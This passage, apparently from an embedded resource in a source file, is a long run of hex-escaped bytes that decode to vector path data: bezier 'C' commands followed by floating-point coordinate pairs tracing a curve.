\x36\x34\x38\x34\x39\x37\x20\x31\x35\x2e\x33\x34\x33\x39\x33\x30\
\x32\x34\x35\x34\x20\x31\x33\x2e\x32\x38\x39\x33\x30\x35\x39\x31\
\x38\x35\x20\x31\x35\x2e\x33\x33\x39\x32\x32\x39\x32\x31\x32\x35\
\x20\x43\x20\x31\x33\x2e\x32\x39\x35\x35\x34\x36\x39\x38\x37\x34\
\x20\x31\x35\x2e\x33\x33\x34\x35\x32\x38\x31\x37\x39\x37\x20\x31\
\x33\x2e\x33\x30\x31\x37\x38\x38\x30\x35\x36\x32\x20\x31\x35\x2e\
\x33\x32\x39\x30\x30\x33\x31\x35\x30\x31\x20\x31\x33\x2e\x33\x30\
\x38\x30\x32\x39\x31\x32\x35\x31\x20\x31\x35\x2e\x33\x32\x32\x36\
\x36\x33\x33\x30\x38\x32\x20\x43\x20\x31\x33\x2e\x33\x31\x34\x32\
\x37\x30\x31\x39\x33\x39\x20\x31\x35\x2e\x33\x31\x36\x33\x32\x33\
\x34\x36\x36\x33\x20\x31\x33\x2e\x33\x32\x30\x35\x31\x31\x32\x36\
\x32\x37\x20\x31\x35\x2e\x33\x30\x39\x31\x36\x33\x39\x31\x30\x38\
\x20\x31\x33\x2e\x33\x32\x36\x37\x35\x32\x33\x33\x31\x36\x20\x31\
\x35\x2e\x33\x30\x31\x31\x39\x35\x30\x35\x39\x39\x20\x43\x20\x31\
\x33\x2e\x33\x33\x32\x39\x39\x33\x34\x30\x30\x34\x20\x31\x35\x2e\
\x32\x39\x33\x32\x32\x36\x32\x30\x39\x20\x31\x33\x2e\x33\x33\x39\
\x32\x33\x34\x34\x36\x39\x32\x20\x31\x35\x2e\x32\x38\x34\x34\x34\
\x33\x31\x39\x34\x38\x20\x31\x33\x2e\x33\x34\x35\x34\x37\x35\x35\
\x33\x38\x31\x20\x31\x35\x2e\x32\x37\x34\x38\x35\x37\x36\x35\x33\
\x31\x20\x43\x20\x31\x33\x2e\x33\x35\x31\x37\x31\x36\x36\x30\x36\
\x39\x20\x31\x35\x2e\x32\x36\x35\x32\x37\x32\x31\x31\x31\x34\x20\
\x31\x33\x2e\x33\x35\x37\x39\x35\x37\x36\x37\x35\x37\x20\x31\x35\
\x2e\x32\x35\x34\x38\x37\x39\x32\x31\x35\x31\x20\x31\x33\x2e\x33\
\x36\x34\x31\x39\x38\x37\x34\x34\x36\x20\x31\x35\x2e\x32\x34\x33\
\x36\x39\x31\x37\x39\x39\x38\x20\x43\x20\x31\x33\x2e\x33\x37\x30\
\x34\x33\x39\x38\x31\x33\x34\x20\x31\x35\x2e\x32\x33\x32\x35\x30\
\x34\x33\x38\x34\x35\x20\x31\x33\x2e\x33\x37\x36\x36\x38\x30\x38\
\x38\x32\x33\x20\x31\x35\x2e\x32\x32\x30\x35\x31\x37\x36\x37\x31\
\x33\x20\x31\x33\x2e\x33\x38\x32\x39\x32\x31\x39\x35\x31\x31\x20\
\x31\x35\x2e\x32\x30\x37\x37\x34\x35\x36\x37\x35\x38\x20\x43\x20\
\x31\x33\x2e\x33\x38\x39\x31\x36\x33\x30\x31\x39\x39\x20\x31\x35\
\x2e\x31\x39\x34\x39\x37\x33\x36\x38\x30\x33\x20\x31\x33\x2e\x33\
\x39\x35\x34\x30\x34\x30\x38\x38\x38\x20\x31\x35\x2e\x31\x38\x31\
\x34\x31\x31\x36\x37\x39\x33\x20\x31\x33\x2e\x34\x30\x31\x36\x34\
\x35\x31\x35\x37\x36\x20\x31\x35\x2e\x31\x36\x37\x30\x37\x34\x38\
\x34\x36\x33\x20\x43\x20\x31\x33\x2e\x34\x30\x37\x38\x38\x36\x32\
\x32\x36\x34\x20\x31\x35\x2e\x31\x35\x32\x37\x33\x38\x30\x31\x33\
\x34\x20\x31\x33\x2e\x34\x31\x34\x31\x32\x37\x32\x39\x35\x33\x20\
\x31\x35\x2e\x31\x33\x37\x36\x32\x31\x36\x38\x38\x35\x20\x31\x33\
\x2e\x34\x32\x30\x33\x36\x38\x33\x36\x34\x31\x20\x31\x35\x2e\x31\
\x32\x31\x37\x34\x32\x31\x37\x39\x39\x20\x43\x20\x31\x33\x2e\x34\
\x32\x36\x36\x30\x39\x34\x33\x32\x39\x20\x31\x35\x2e\x31\x30\x35\
\x38\x36\x32\x36\x37\x31\x32\x20\x31\x33\x2e\x34\x33\x32\x38\x35\
\x30\x35\x30\x31\x38\x20\x31\x35\x2e\x30\x38\x39\x32\x31\x35\x33\
\x38\x39\x20\x31\x33\x2e\x34\x33\x39\x30\x39\x31\x35\x37\x30\x36\
\x20\x31\x35\x2e\x30\x37\x31\x38\x31\x37\x37\x35\x31\x31\x20\x43\
\x20\x31\x33\x2e\x34\x34\x35\x33\x33\x32\x36\x33\x39\x34\x20\x31\
\x35\x2e\x30\x35\x34\x34\x32\x30\x31\x31\x33\x32\x20\x31\x33\x2e\
\x34\x35\x31\x35\x37\x33\x37\x30\x38\x33\x20\x31\x35\x2e\x30\x33\
\x36\x32\x36\x37\x36\x30\x36\x39\x20\x31\x33\x2e\x34\x35\x37\x38\
\x31\x34\x37\x37\x37\x31\x20\x31\x35\x2e\x30\x31\x37\x33\x37\x38\
\x37\x33\x32\x38\x20\x43\x20\x31\x33\x2e\x34\x36\x34\x30\x35\x35\
\x38\x34\x36\x20\x31\x34\x2e\x39\x39\x38\x34\x38\x39\x38\x35\x38\
\x36\x20\x31\x33\x2e\x34\x37\x30\x32\x39\x36\x39\x31\x34\x38\x20\
\x31\x34\x2e\x39\x37\x38\x38\x36\x30\x31\x38\x38\x32\x20\x31\x33\
\x2e\x34\x37\x36\x35\x33\x37\x39\x38\x33\x36\x20\x31\x34\x2e\x39\
\x35\x38\x35\x30\x39\x32\x37\x36\x20\x43\x20\x31\x33\x2e\x34\x38\
\x32\x37\x37\x39\x30\x35\x32\x35\x20\x31\x34\x2e\x39\x33\x38\x31\
\x35\x38\x33\x36\x33\x39\x20\x31\x33\x2e\x34\x38\x39\x30\x32\x30\
\x31\x32\x31\x33\x20\x31\x34\x2e\x39\x31\x37\x30\x38\x31\x38\x37\
\x32\x36\x20\x31\x33\x2e\x34\x39\x35\x32\x36\x31\x31\x39\x30\x31\
\x20\x31\x34\x2e\x38\x39\x35\x33\x30\x30\x33\x38\x30\x37\x20\x43\
\x20\x31\x33\x2e\x35\x30\x31\x35\x30\x32\x32\x35\x39\x20\x31\x34\
\x2e\x38\x37\x33\x35\x31\x38\x38\x38\x38\x37\x20\x31\x33\x2e\x35\
\x30\x37\x37\x34\x33\x33\x32\x37\x38\x20\x31\x34\x2e\x38\x35\x31\
\x30\x32\x38\x31\x35\x36\x35\x20\x31\x33\x2e\x35\x31\x33\x39\x38\
\x34\x33\x39\x36\x36\x20\x31\x34\x2e\x38\x32\x37\x38\x34\x39\x37\
\x35\x34\x33\x20\x43\x20\x31\x33\x2e\x35\x32\x30\x32\x32\x35\x34\
\x36\x35\x35\x20\x31\x34\x2e\x38\x30\x34\x36\x37\x31\x33\x35\x32\
\x32\x20\x31\x33\x2e\x35\x32\x36\x34\x36\x36\x35\x33\x34\x33\x20\
\x31\x34\x2e\x37\x38\x30\x38\x30\x31\x31\x34\x34\x39\x20\x31\x33\
\x2e\x35\x33\x32\x37\x30\x37\x36\x30\x33\x32\x20\x31\x34\x2e\x37\
\x35\x36\x32\x36\x31\x36\x36\x31\x34\x20\x43\x20\x31\x33\x2e\x35\
\x33\x38\x39\x34\x38\x36\x37\x32\x20\x31\x34\x2e\x37\x33\x31\x37\
\x32\x32\x31\x37\x38\x20\x31\x33\x2e\x35\x34\x35\x31\x38\x39\x37\
\x34\x30\x38\x20\x31\x34\x2e\x37\x30\x36\x35\x30\x39\x33\x39\x33\
\x39\x20\x31\x33\x2e\x35\x35\x31\x34\x33\x30\x38\x30\x39\x37\x20\
\x31\x34\x2e\x36\x38\x30\x36\x34\x36\x37\x36\x32\x31\x20\x43\x20\
\x31\x33\x2e\x35\x35\x37\x36\x37\x31\x38\x37\x38\x35\x20\x31\x34\
\x2e\x36\x35\x34\x37\x38\x34\x31\x33\x30\x32\x20\x31\x33\x2e\x35\
\x36\x33\x39\x31\x32\x39\x34\x37\x33\x20\x31\x34\x2e\x36\x32\x38\
\x32\x36\x37\x37\x34\x33\x31\x20\x31\x33\x2e\x35\x37\x30\x31\x35\
\x34\x30\x31\x36\x32\x20\x31\x34\x2e\x36\x30\x31\x31\x32\x31\x39\
\x34\x30\x39\x20\x43\x20\x31\x33\x2e\x35\x37\x36\x33\x39\x35\x30\
\x38\x35\x20\x31\x34\x2e\x35\x37\x33\x39\x37\x36\x31\x33\x38\x38\
\x20\x31\x33\x2e\x35\x38\x32\x36\x33\x36\x31\x35\x33\x38\x20\x31\
\x34\x2e\x35\x34\x36\x31\x39\x37\x31\x33\x37\x33\x20\x31\x33\x2e\
\x35\x38\x38\x38\x37\x37\x32\x32\x32\x37\x20\x31\x34\x2e\x35\x31\
\x37\x38\x31\x30\x31\x32\x36\x36\x20\x43\x20\x31\x33\x2e\x35\x39\
\x35\x31\x31\x38\x32\x39\x31\x35\x20\x31\x34\x2e\x34\x38\x39\x34\
\x32\x33\x31\x31\x35\x39\x20\x31\x33\x2e\x36\x30\x31\x33\x35\x39\
\x33\x36\x30\x34\x20\x31\x34\x2e\x34\x36\x30\x34\x32\x34\x34\x34\
\x30\x35\x20\x31\x33\x2e\x36\x30\x37\x36\x30\x30\x34\x32\x39\x32\
\x20\x31\x34\x2e\x34\x33\x30\x38\x34\x30\x31\x30\x31\x36\x20\x43\
\x20\x31\x33\x2e\x36\x31\x33\x38\x34\x31\x34\x39\x38\x20\x31\x34\
\x2e\x34\x30\x31\x32\x35\x35\x37\x36\x32\x37\x20\x31\x33\x2e\x36\
\x32\x30\x30\x38\x32\x35\x36\x36\x39\x20\x31\x34\x2e\x33\x37\x31\
\x30\x38\x32\x32\x33\x39\x32\x20\x31\x33\x2e\x36\x32\x36\x33\x32\
\x33\x36\x33\x35\x37\x20\x31\x34\x2e\x33\x34\x30\x33\x34\x36\x33\
\x30\x33\x32\x20\x43\x20\x31\x33\x2e\x36\x33\x32\x35\x36\x34\x37\
\x30\x34\x35\x20\x31\x34\x2e\x33\x30\x39\x36\x31\x30\x33\x36\x37\
\x32\x20\x31\x33\x2e\x36\x33\x38\x38\x30\x35\x37\x37\x33\x34\x20\
\x31\x34\x2e\x32\x37\x38\x33\x30\x38\x36\x33\x37\x36\x20\x31\x33\
\x2e\x36\x34\x35\x30\x34\x36\x38\x34\x32\x32\x20\x31\x34\x2e\x32\
\x34\x36\x34\x36\x38\x36\x31\x35\x38\x20\x43\x20\x31\x33\x2e\x36\
\x35\x31\x32\x38\x37\x39\x31\x31\x20\x31\x34\x2e\x32\x31\x34\x36\
\x32\x38\x35\x39\x34\x20\x31\x33\x2e\x36\x35\x37\x35\x32\x38\x39\
\x37\x39\x39\x20\x31\x34\x2e\x31\x38\x32\x32\x34\x37\x30\x34\x34\
\x31\x20\x31\x33\x2e\x36\x36\x33\x37\x37\x30\x30\x34\x38\x37\x20\
\x31\x34\x2e\x31\x34\x39\x33\x35\x32\x31\x35\x34\x35\x20\x43\x20\
\x31\x33\x2e\x36\x37\x30\x30\x31\x31\x31\x31\x37\x35\x20\x31\x34\
\x2e\x31\x31\x36\x34\x35\x37\x32\x36\x34\x38\x20\x31\x33\x2e\x36\
\x37\x36\x32\x35\x32\x31\x38\x36\x34\x20\x31\x34\x2e\x30\x38\x33\
\x30\x34\x35\x39\x34\x39\x37\x20\x31\x33\x2e\x36\x38\x32\x34\x39\
\x33\x32\x35\x35\x32\x20\x31\x34\x2e\x30\x34\x39\x31\x34\x37\x30\
\x34\x30\x38\x20\x43\x20\x31\x33\x2e\x36\x38\x38\x37\x33\x34\x33\
\x32\x34\x31\x20\x31\x34\x2e\x30\x31\x35\x32\x34\x38\x31\x33\x31\
\x38\x20\x31\x33\x2e\x36\x39\x34\x39\x37\x35\x33\x39\x32\x39\x20\
\x31\x33\x2e\x39\x38\x30\x38\x35\x38\x36\x39\x38\x33\x20\x31\x33\
\x2e\x37\x30\x31\x32\x31\x36\x34\x36\x31\x37\x20\x31\x33\x2e\x39\
\x34\x36\x30\x30\x38\x31\x37\x30\x36\x20\x43\x20\x31\x33\x2e\x37\
\x30\x37\x34\x35\x37\x35\x33\x30\x36\x20\x31\x33\x2e\x39\x31\x31\
\x31\x35\x37\x36\x34\x33\x20\x31\x33\x2e\x37\x31\x33\x36\x39\x38\
\x35\x39\x39\x34\x20\x31\x33\x2e\x38\x37\x35\x38\x34\x33\x32\x34\
\x39\x39\x20\x31\x33\x2e\x37\x31\x39\x39\x33\x39\x36\x36\x38\x32\
\x20\x31\x33\x2e\x38\x34\x30\x30\x39\x34\x39\x37\x35\x20\x43\x20\
\x31\x33\x2e\x37\x32\x36\x31\x38\x30\x37\x33\x37\x31\x20\x31\x33\
\x2e\x38\x30\x34\x33\x34\x36\x37\x30\x30\x32\x20\x31\x33\x2e\x37\
\x33\x32\x34\x32\x31\x38\x30\x35\x39\x20\x31\x33\x2e\x37\x36\x38\
\x31\x36\x31\x39\x33\x36\x31\x20\x31\x33\x2e\x37\x33\x38\x36\x36\
\x32\x38\x37\x34\x37\x20\x31\x33\x2e\x37\x33\x31\x35\x37\x31\x31\
\x37\x33\x34\x20\x43\x20\x31\x33\x2e\x37\x34\x34\x39\x30\x33\x39\
\x34\x33\x36\x20\x31\x33\x2e\x36\x39\x34\x39\x38\x30\x34\x31\x30\
\x37\x20\x31\x33\x2e\x37\x35\x31\x31\x34\x35\x30\x31\x32\x34\x20\
\x31\x33\x2e\x36\x35\x37\x39\x38\x31\x32\x30\x39\x37\x20\x31\x33\
\x2e\x37\x35\x37\x33\x38\x36\x30\x38\x31\x33\x20\x31\x33\x2e\x36\
\x32\x30\x36\x30\x34\x35\x32\x30\x37\x20\x43\x20\x31\x33\x2e\x37\
\x36\x33\x36\x32\x37\x31\x35\x30\x31\x20\x31\x33\x2e\x35\x38\x33\
\x32\x32\x37\x38\x33\x31\x38\x20\x31\x33\x2e\x37\x36\x39\x38\x36\
\x38\x32\x31\x38\x39\x20\x31\x33\x2e\x35\x34\x35\x34\x37\x31\x33\
\x38\x36\x38\x20\x31\x33\x2e\x37\x37\x36\x31\x30\x39\x32\x38\x37\
\x38\x20\x31\x33\x2e\x35\x30\x37\x33\x36\x36\x35\x34\x38\x20\x43\
\x20\x31\x33\x2e\x37\x38\x32\x33\x35\x30\x33\x35\x36\x36\x20\x31\
\x33\x2e\x34\x36\x39\x32\x36\x31\x37\x30\x39\x32\x20\x31\x33\x2e\
\x37\x38\x38\x35\x39\x31\x34\x32\x35\x34\x20\x31\x33\x2e\x34\x33\
\x30\x38\x30\x36\x33\x38\x33\x37\x20\x31\x33\x2e\x37\x39\x34\x38\
\x33\x32\x34\x39\x34\x33\x20\x31\x33\x2e\x33\x39\x32\x30\x33\x32\
\x32\x39\x37\x32\x20\x43\x20\x31\x33\x2e\x38\x30\x31\x30\x37\x33\
\x35\x36\x33\x31\x20\x31\x33\x2e\x33\x35\x33\x32\x35\x38\x32\x31\
\x30\x37\x20\x31\x33\x2e\x38\x30\x37\x33\x31\x34\x36\x33\x31\x39\
\x20\x31\x33\x2e\x33\x31\x34\x31\x36\x33\x34\x34\x38\x35\x20\x31\
\x33\x2e\x38\x31\x33\x35\x35\x35\x37\x30\x30\x38\x20\x31\x33\x2e\
\x32\x37\x34\x37\x38\x30\x30\x35\x30\x38\x20\x43\x20\x31\x33\x2e\
\x38\x31\x39\x37\x39\x36\x37\x36\x39\x36\x20\x31\x33\x2e\x32\x33\
\x35\x33\x39\x36\x36\x35\x33\x31\x20\x31\x33\x2e\x38\x32\x36\x30\
\x33\x37\x38\x33\x38\x34\x20\x31\x33\x2e\x31\x39\x35\x37\x32\x32\
\x38\x38\x36\x35\x20\x31\x33\x2e\x38\x33\x32\x32\x37\x38\x39\x30\
\x37\x33\x20\x31\x33\x2e\x31\x35\x35\x37\x39\x31\x30\x35\x36\x31\
\x20\x43\x20\x31\x33\x2e\x38\x33\x38\x35\x31\x39\x39\x37\x36\x31\
\x20\x31\x33\x2e\x31\x31\x35\x38\x35\x39\x32\x32\x35\x36\x20\x31\
\x33\x2e\x38\x34\x34\x37\x36\x31\x30\x34\x35\x20\x31\x33\x2e\x30\
\x37\x35\x36\x36\x37\x37\x38\x31\x39\x20\x31\x33\x2e\x38\x35\x31\
\x30\x30\x32\x31\x31\x33\x38\x20\x31\x33\x2e\x30\x33\x35\x32\x34\
\x39\x32\x34\x34\x38\x20\x43\x20\x31\x33\x2e\x38\x35\x37\x32\x34\
\x33\x31\x38\x32\x36\x20\x31\x32\x2e\x39\x39\x34\x38\x33\x30\x37\
\x30\x37\x38\x20\x31\x33\x2e\x38\x36\x33\x34\x38\x34\x32\x35\x31\
\x35\x20\x31\x32\x2e\x39\x35\x34\x31\x38\x33\x37\x31\x34\x34\x20\
\x31\x33\x2e\x38\x36\x39\x37\x32\x35\x33\x32\x30\x33\x20\x31\x32\
\x2e\x39\x31\x33\x33\x34\x30\x39\x34\x39\x33\x20\x43\x20\x31\x33\
\x2e\x38\x37\x35\x39\x36\x36\x33\x38\x39\x31\x20\x31\x32\x2e\x38\
\x37\x32\x34\x39\x38\x31\x38\x34\x33\x20\x31\x33\x2e\x38\x38\x32\
\x32\x30\x37\x34\x35\x38\x20\x31\x32\x2e\x38\x33\x31\x34\x35\x38\
\x34\x37\x32\x39\x20\x31\x33\x2e\x38\x38\x38\x34\x34\x38\x35\x32\
\x36\x38\x20\x31\x32\x2e\x37\x39\x30\x32\x35\x34\x36\x31\x34\x31\
\x20\x43\x20\x31\x33\x2e\x38\x39\x34\x36\x38\x39\x35\x39\x35\x36\
\x20\x31\x32\x2e\x37\x34\x39\x30\x35\x30\x37\x35\x35\x33\x20\x31\
\x33\x2e\x39\x30\x30\x39\x33\x30\x36\x36\x34\x35\x20\x31\x32\x2e\
\x37\x30\x37\x36\x38\x31\x37\x36\x34\x37\x20\x31\x33\x2e\x39\x30\
\x37\x31\x37\x31\x37\x33\x33\x33\x20\x31\x32\x2e\x36\x36\x36\x31\
\x38\x30\x35\x30\x34\x36\x20\x43\x20\x31\x33\x2e\x39\x31\x33\x34\
\x31\x32\x38\x30\x32\x32\x20\x31\x32\x2e\x36\x32\x34\x36\x37\x39\
\x32\x34\x34\x35\x20\x31\x33\x2e\x39\x31\x39\x36\x35\x33\x38\x37\
\x31\x20\x31\x32\x2e\x35\x38\x33\x30\x34\x34\x39\x32\x32\x34\x20\
\x31\x33\x2e\x39\x32\x35\x38\x39\x34\x39\x33\x39\x38\x20\x31\x32\
\x2e\x35\x34\x31\x33\x31\x30\x34\x31\x33\x33\x20\x43\x20\x31\x33\
\x2e\x39\x33\x32\x31\x33\x36\x30\x30\x38\x37\x20\x31\x32\x2e\x34\
\x39\x39\x35\x37\x35\x39\x30\x34\x32\x20\x31\x33\x2e\x39\x33\x38\
\x33\x37\x37\x30\x37\x37\x35\x20\x31\x32\x2e\x34\x35\x37\x37\x34\
\x30\x36\x30\x38\x34\x20\x31\x33\x2e\x39\x34\x34\x36\x31\x38\x31\
\x34\x36\x33\x20\x31\x32\x2e\x34\x31\x35\x38\x33\x37\x33\x36\x33\
\x20\x43\x20\x31\x33\x2e\x39\x35\x30\x38\x35\x39\x32\x31\x35\x32\
\x20\x31\x32\x2e\x33\x37\x33\x39\x33\x34\x31\x31\x37\x35\x20\x31\
\x33\x2e\x39\x35\x37\x31\x30\x30\x32\x38\x34\x20\x31\x32\x2e\x33\
\x33\x31\x39\x36\x32\x35\x31\x36\x37\x20\x31\x33\x2e\x39\x36\x33\
\x33\x34\x31\x33\x35\x32\x38\x20\x31\x32\x2e\x32\x38\x39\x39\x35\
\x35\x33\x30\x38\x35\x20\x43\x20\x31\x33\x2e\x39\x36\x39\x35\x38\
\x32\x34\x32\x31\x37\x20\x31\x32\x2e\x32\x34\x37\x39\x34\x38\x31\
\x30\x30\x33\x20\x31\x33\x2e\x39\x37\x35\x38\x32\x33\x34\x39\x30\
\x35\x20\x31\x32\x2e\x32\x30\x35\x39\x30\x35\x30\x37\x33\x36\x20\
\x31\x33\x2e\x39\x38\x32\x30\x36\x34\x35\x35\x39\x33\x20\x31\x32\
\x2e\x31\x36\x33\x38\x35\x38\x38\x33\x37\x20\x43\x20\x31\x33\x2e\
\x39\x38\x38\x33\x30\x35\x36\x32\x38\x32\x20\x31\x32\x2e\x31\x32\
\x31\x38\x31\x32\x36\x30\x30\x33\x20\x31\x33\x2e\x39\x39\x34\x35\
\x34\x36\x36\x39\x37\x20\x31\x32\x2e\x30\x37\x39\x37\x36\x33\x31\
\x33\x37\x35\x20\x31\x34\x2e\x30\x30\x30\x37\x38\x37\x37\x36\x35\
\x39\x20\x31\x32\x2e\x30\x33\x37\x37\x34\x32\x38\x36\x37\x20\x43\
\x20\x31\x34\x2e\x30\x30\x37\x30\x32\x38\x38\x33\x34\x37\x20\x31\
\x31\x2e\x39\x39\x35\x37\x32\x32\x35\x39\x36\x35\x20\x31\x34\x2e\
\x30\x31\x33\x32\x36\x39\x39\x30\x33\x35\x20\x31\x31\x2e\x39\x35\
\x33\x37\x33\x31\x36\x39\x37\x31\x20\x31\x34\x2e\x30\x31\x39\x35\
\x31\x30\x39\x37\x32\x34\x20\x31\x31\x2e\x39\x31\x31\x38\x30\x32\
\x33\x34\x37\x32\x20\x43\x20\x31\x34\x2e\x30\x32\x35\x37\x35\x32\
\x30\x34\x31\x32\x20\x31\x31\x2e\x38\x36\x39\x38\x37\x32\x39\x39\
\x37\x33\x20\x31\x34\x2e\x30\x33\x31\x39\x39\x33\x31\x31\x20\x31\
\x31\x2e\x38\x32\x38\x30\x30\x35\x35\x37\x30\x34\x20\x31\x34\x2e\
\x30\x33\x38\x32\x33\x34\x31\x37\x38\x39\x20\x31\x31\x2e\x37\x38\
\x36\x32\x33\x31\x39\x35\x35\x31\x20\x43\x20\x31\x34\x2e\x30\x34\
\x34\x34\x37\x35\x32\x34\x37\x37\x20\x31\x31\x2e\x37\x34\x34\x34\
\x35\x38\x33\x33\x39\x38\x20\x31\x34\x2e\x30\x35\x30\x37\x31\x36\
\x33\x31\x36\x35\x20\x31\x31\x2e\x37\x30\x32\x37\x37\x39\x31\x30\
\x33\x36\x20\x31\x34\x2e\x30\x35\x36\x39\x35\x37\x33\x38\x35\x34\
\x20\x31\x31\x2e\x36\x36\x31\x32\x32\x35\x37\x39\x36\x20\x43\x20\
\x31\x34\x2e\x30\x36\x33\x31\x39\x38\x34\x35\x34\x32\x20\x31\x31\
\x2e\x36\x31\x39\x36\x37\x32\x34\x38\x38\x35\x20\x31\x34\x2e\x30\
\x36\x39\x34\x33\x39\x35\x32\x33\x31\x20\x31\x31\x2e\x35\x37\x38\
\x32\x34\x35\x38\x37\x30\x32\x20\x31\x34\x2e\x30\x37\x35\x36\x38\
\x30\x35\x39\x31\x39\x20\x31\x31\x2e\x35\x33\x36\x39\x37\x37\x31\
\x30\x33\x31\x20\x43\x20\x31\x34\x2e\x30\x38\x31\x39\x32\x31\x36\
\x36\x30\x37\x20\x31\x31\x2e\x34\x39\x35\x37\x30\x38\x33\x33\x36\
\x20\x31\x34\x2e\x30\x38\x38\x31\x36\x32\x37\x32\x39\x36\x20\x31\
\x31\x2e\x34\x35\x34\x35\x39\x38\x33\x37\x32\x36\x20\x31\x34\x2e\
\x30\x39\x34\x34\x30\x33\x37\x39\x38\x34\x20\x31\x31\x2e\x34\x31\
\x33\x36\x37\x37\x39\x33\x38\x37\x20\x43\x20\x31\x34\x2e\x31\x30\
\x30\x36\x34\x34\x38\x36\x37\x32\x20\x31\x31\x2e\x33\x37\x32\x37\
\x35\x37\x35\x30\x34\x37\x20\x31\x34\x2e\x31\x30\x36\x38\x38\x35\
\x39\x33\x36\x31\x20\x31\x31\x2e\x33\x33\x32\x30\x32\x37\x37\x34\
\x33\x35\x20\x31\x34\x2e\x31\x31\x33\x31\x32\x37\x30\x30\x34\x39\
\x20\x31\x31\x2e\x32\x39\x31\x35\x31\x38\x38\x39\x37\x32\x20\x43\
\x20\x31\x34\x2e\x31\x31\x39\x33\x36\x38\x30\x37\x33\x37\x20\x31\
\x31\x2e\x32\x35\x31\x30\x31\x30\x30\x35\x30\x38\x20\x31\x34\x2e\
\x31\x32\x35\x36\x30\x39\x31\x34\x32\x36\x20\x31\x31\x2e\x32\x31\
\x30\x37\x32\x33\x34\x35\x31\x34\x20\x31\x34\x2e\x31\x33\x31\x38\
\x35\x30\x32\x31\x31\x34\x20\x31\x31\x2e\x31\x37\x30\x36\x38\x38\
\x38\x31\x30\x37\x20\x43\x20\x31\x34\x2e\x31\x33\x38\x30\x39\x31\
\x32\x38\x30\x33\x20\x31\x31\x2e\x31\x33\x30\x36\x35\x34\x31\x37\
\x30\x31\x20\x31\x34\x2e\x31\x34\x34\x33\x33\x32\x33\x34\x39\x31\
\x20\x31\x31\x2e\x30\x39\x30\x38\x37\x33\x30\x30\x37\x20\x31\x34\
\x2e\x31\x35\x30\x35\x37\x33\x34\x31\x37\x39\x20\x31\x31\x2e\x30\
\x35\x31\x33\x37\x34\x34\x35\x37\x32\x20\x43\x20\x31\x34\x2e\x31\
\x35\x36\x38\x31\x34\x34\x38\x36\x38\x20\x31\x31\x2e\x30\x31\x31\
\x38\x37\x35\x39\x30\x37\x34\x20\x31\x34\x2e\x31\x36\x33\x30\x35\
\x35\x35\x35\x35\x36\x20\x31\x30\x2e\x39\x37\x32\x36\x36\x31\x36\
\x37\x33\x39\x20\x31\x34\x2e\x31\x36\x39\x32\x39\x36\x36\x32\x34\
\x34\x20\x31\x30\x2e\x39\x33\x33\x37\x36\x30\x32\x37\x31\x34\x20\
\x43\x20\x31\x34\x2e\x31\x37\x35\x35\x33\x37\x36\x39\x33\x33\x20\
\x31\x30\x2e\x38\x39\x34\x38\x35\x38\x38\x36\x38\x38\x20\x31\x34\
\x2e\x31\x38\x31\x37\x37\x38\x37\x36\x32\x31\x20\x31\x30\x2e\x38\
\x35\x36\x32\x37\x32\x31\x38\x32\x20\x31\x34\x2e\x31\x38\x38\x30\
\x31\x39\x38\x33\x30\x39\x20\x31\x30\x2e\x38\x31\x38\x30\x32\x38\
\x30\x36\x20\x43\x20\x31\x34\x2e\x31\x39\x34\x32\x36\x30\x38\x39\
\x39\x38\x20\x31\x30\x2e\x37\x37\x39\x37\x38\x33\x39\x33\x38\x31\
\x20\x31\x34\x2e\x32\x30\x30\x35\x30\x31\x39\x36\x38\x36\x20\x31\
\x30\x2e\x37\x34\x31\x38\x38\x34\x34\x34\x34\x37\x20\x31\x34\x2e\
\x32\x30\x36\x37\x34\x33\x30\x33\x37\x34\x20\x31\x30\x2e\x37\x30\
\x34\x33\x35\x36\x37\x32\x30\x37\x20\x43\x20\x31\x34\x2e\x32\x31\
\x32\x39\x38\x34\x31\x30\x36\x33\x20\x31\x30\x2e\x36\x36\x36\x38\
\x32\x38\x39\x39\x36\x37\x20\x31\x34\x2e\x32\x31\x39\x32\x32\x35\
\x31\x37\x35\x31\x20\x31\x30\x2e\x36\x32\x39\x36\x37\x35\x32\x38\
\x31\x34\x20\x31\x34\x2e\x32\x32\x35\x34\x36\x36\x32\x34\x34\x20\
\x31\x30\x2e\x35\x39\x32\x39\x32\x31\x39\x36\x35\x33\x20\x43\x20\
\x31\x34\x2e\x32\x33\x31\x37\x30\x37\x33\x31\x32\x38\x20\x31\x30\
\x2e\x35\x35\x36\x31\x36\x38\x36\x34\x39\x32\x20\x31\x34\x2e\x32\
\x33\x37\x39\x34\x38\x33\x38\x31\x36\x20\x31\x30\x2e\x35\x31\x39\
\x38\x31\x38\x31\x34\x33\x38\x20\x31\x34\x2e\x32\x34\x34\x31\x38\
\x39\x34\x35\x30\x35\x20\x31\x30\x2e\x34\x38\x33\x38\x39\x36\x30\
\x34\x38\x35\x20\x43\x20\x31\x34\x2e\x32\x35\x30\x34\x33\x30\x35\
\x31\x39\x33\x20\x31\x30\x2e\x34\x34\x37\x39\x37\x33\x39\x35\x33\
\x32\x20\x31\x34\x2e\x32\x35\x36\x36\x37\x31\x35\x38\x38\x31\x20\
\x31\x30\x2e\x34\x31\x32\x34\x38\x32\x38\x34\x37\x38\x20\x31\x34\
\x2e\x32\x36\x32\x39\x31\x32\x36\x35\x37\x20\x31\x30\x2e\x33\x37\
\x37\x34\x34\x37\x35\x30\x31\x33\x20\x43\x20\x31\x34\x2e\x32\x36\
\x39\x31\x35\x33\x37\x32\x35\x38\x20\x31\x30\x2e\x33\x34\x32\x34\
\x31\x32\x31\x35\x34\x38\x20\x31\x34\x2e\x32\x37\x35\x33\x39\x34\
\x37\x39\x34\x36\x20\x31\x30\x2e\x33\x30\x37\x38\x33\x35\x33\x31\
\x31\x33\x20\x31\x34\x2e\x32\x38\x31\x36\x33\x35\x38\x36\x33\x35\
\x20\x31\x30\x2e\x32\x37\x33\x37\x34\x30\x38\x37\x30\x38\x20\x43\
\x20\x31\x34\x2e\x32\x38\x37\x38\x37\x36\x39\x33\x32\x33\x20\x31\
\x30\x2e\x32\x33\x39\x36\x34\x36\x34\x33\x30\x33\x20\x31\x34\x2e\
\x32\x39\x34\x31\x31\x38\x30\x30\x31\x32\x20\x31\x30\x2e\x32\x30\
\x36\x30\x33\x37\x32\x39\x37\x32\x20\x31\x34\x2e\x33\x30\x30\x33\
\x35\x39\x30\x37\x20\x31\x30\x2e\x31\x37\x32\x39\x33\x36\x34\x36\
\x35\x35\x20\x43\x20\x31\x34\x2e\x33\x30\x36\x36\x30\x30\x31\x33\
\x38\x38\x20\x31\x30\x2e\x31\x33\x39\x38\x33\x35\x36\x33\x33\x38\
